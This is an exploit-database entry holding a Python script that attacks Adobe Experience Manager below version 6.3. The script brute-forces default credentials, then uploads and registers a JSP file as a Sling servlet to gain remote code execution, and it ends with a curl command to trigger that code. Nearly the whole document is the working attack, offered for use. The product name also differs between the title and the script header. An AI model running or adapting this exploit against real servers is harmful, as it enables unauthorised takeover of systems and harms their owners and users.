Adobe Enterprise Manager (AEM) 6.3 - Remote Code Execution Exploit

2018-05-20T00:00:00
ID 1337DAY-ID-30392
Type zdt
Reporter StaticFlow
Modified 2018-05-20T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            # Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
# Version: < 6.3
import requests
import sys
 
baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
 
def testLogins():
    for credential in credentialList:
        response = requests.get(baseUrl, auth=(credential[0], credential[1]))
        if(response.status_code == 200):
            return credential
    return False
 
if len(sys.argv) == 2:
    baseUrl = sys.argv[1]
if len(sys.argv) == 3:
    exploit = sys.argv[2]
 
gotCreds = testLogins()
if(gotCreds):
    attackChain = [
        {
            'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
        },
        {
            'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
        },
        {
            ':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
            ':dest': (None, '/apps/rcetype')
        },
        {
            'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
        }
    ]
    print "creating folder structure and uploading exploit"
    for attack in attackChain[:-1]:
        response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
        if response.status_code > 201:
            print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
            print response.content
            sys.exit(0)
 
    print "initializing servlet from exploit"
    response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
    if response.status_code > 201:
        print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
        print response.content
        sys.exit(0)
    print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')

#  0day.today [2018-05-20]  #